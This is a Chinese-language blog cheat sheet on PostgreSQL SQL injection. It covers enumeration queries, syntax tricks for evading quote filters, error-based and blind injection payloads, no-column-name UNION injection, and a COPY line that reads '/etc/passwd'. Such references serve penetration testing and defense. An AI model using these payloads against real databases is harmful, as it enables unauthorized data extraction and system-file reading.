Postgresql 注入总结

Delina

原文链接：Postgresql 注入总结
​
常用语句

1. // 查询当前数据库
   
2. select current_database();
   
3. 
   
4. // 查询当前用户
   
5. select current_user;
   
6. 
   
7. // 查询当前版本
   
8. select version();
   
9. 
   
10. // 查询数据库版本
    
11. SELECT current_setting('server_version_num');
    
12. 
    
13. //查看当前权限
    
14. select CURRENT_SCHEMA()        
    
15. 
    
16. //查询表数据大小
    
17. select pg_size_pretty(pg_indexes_size('users'));
    
18. 
    
19. 
    
20. // 查询所有数据库
    
21. SELECT datname FROM pg_database WHERE datistemplate = false;
    
22. select schema_name from information_schema.schemata
    
23. 
    
24. // 查询当前数据库中的所有表
    
25. select * from pg_tables where schemaname = 'public';
    
26. // 这里的information_schema 是个视图，并不真实存在这个库
    
27. select table_name from information_schema.tables where table_schema='public';
    
28. 
    
29. 
    
30. // 查询列名
    
31. select column_name from information_schema.columns where table_name='表名';
    

复制代码

​ 特性|| 是字符串拼接

1. select 1||2;

复制代码

"" 双引号包裹为列名 而不是字符串

1. select "username" from users

复制代码

支持的比较运算符还包括in 、not in、 exists 、 not exists is

1. select username from users where username in ("admin")
   
2. // 判断查询的结果是否有结果
   
3. select exists (select * from users where username='')
   
4. select (1=1) is true

复制代码

# 不是注释符号 而是运算符号bitwise XOR

1. select 1#2

复制代码

支持的注释符号 /**/ --
PostgreSQL允许”逃逸”字符串

PostgreSQL 还允许 “逃逸”字符串中的内容，这是一个 PostgreSQL 对 SQL 标准的扩展。逃逸字符串语法是通过在字符串前写字母 E(大写或者小写)的方法声明的。比如 E'foo' 。当需要续行包含逃逸字符的字符串时，仅需要在第一行的开始引号前写上 E 就可以了。逃逸字符串使用的是C-风格的反斜杠(\)逃逸：\b(退格)、\f(进纸)、\n(换行)、\r(回车)、\t(水平制表符)。此外还支持 \*digits* 格式的逃逸字符(这里的 *digits* 是一个八进制字节数值)，以及 \x*hexdigits* 格式的逃逸字符(这里的*hexdigits* 代表十六进制字节值)。你创建的字节序列是否是服务器的字符集编码能接受的正确字符，是你自己的责任。任何其它跟在反斜杠后面的字符都当做文本看待。因此，要在字符串常量里包含反斜杠，则写两个反斜杠(\\)。另外，PostgreSQL 允许用一个反斜杠来逃逸单引号(\')，不过，将来版本的 PostgreSQL 将不允许这么用。所以最好坚持使用符合标准的 '' 。

1. <div>// 八进制</div><div>select E'\167\150\157\141\155\151'</div><div>// 十六进制</div><div>select E'\x77\x68\x6f\x61\x6d\x69'</div>

复制代码

字符串边界界定符号(可以绕过无单引号的情况)

1. select $Dianne's horse$

复制代码

加解密函数

1. md5()
   
2. encode('111','base64')
   
3. encode('111','hex')

复制代码

类型转化postgresql 要求查询的时候 类型要一致否则会报错
如下 利用::
常用的数据类型有
字符类型 text、varchar、char
数字类型 int(int4) 、 decimal(numeric) 、bigint(int8)、smallint(int2) 、real、double
布尔类型 boolean
时间类型 timestamp 、 date 、time 、interval

1. select 1::varchar union select 'a'

复制代码

利用 函数进行转换

1. select CAST('5' as char)

复制代码

利用函数转换

1. select to_char(1234，'999')
   
2. select to_date(text, text)
   
3. select to_number('12,454.8-', '99G999D9S')

复制代码

获取正在查询的语句

1. select current_query()
   
2. select query from pg_stat_activity where datname='xx' and state ='active'

复制代码

报错盲注手段挺多的只要让运行时报错即可

1. // 类型转换
   
2. select case when( ascii(substring((select version()),1,1))=1 ) then 1 else (select 'aaa')::int end;
   
3. 
   
4. // 溢出
   
5. select exp((select case when( (select 1)=1  ) then 1 else 777 end))
   
6. 
   
7. // 1/0
   
8. select 1/(select case when( ascii(substring((select version()),1,1))>1 ) then 1 else 0 end)

复制代码

报错注入利用了类型转化来进行报错注入

1. select cast((select version()) as numeric)

复制代码

​

1. select CAST(('zzzz'||(SELECT COALESCE(CAST(schemaname AS CHARACTER(10000)),(CHR(32))) FROM pg_tables OFFSET 0 LIMIT 1)::text||'zzz') AS NUMERIC)

复制代码

无列名注入同其他sql语言

1. select b from (select null, null b, null union select * from users)

复制代码

读文件copy table(column) from '/etc/passwd'

​

​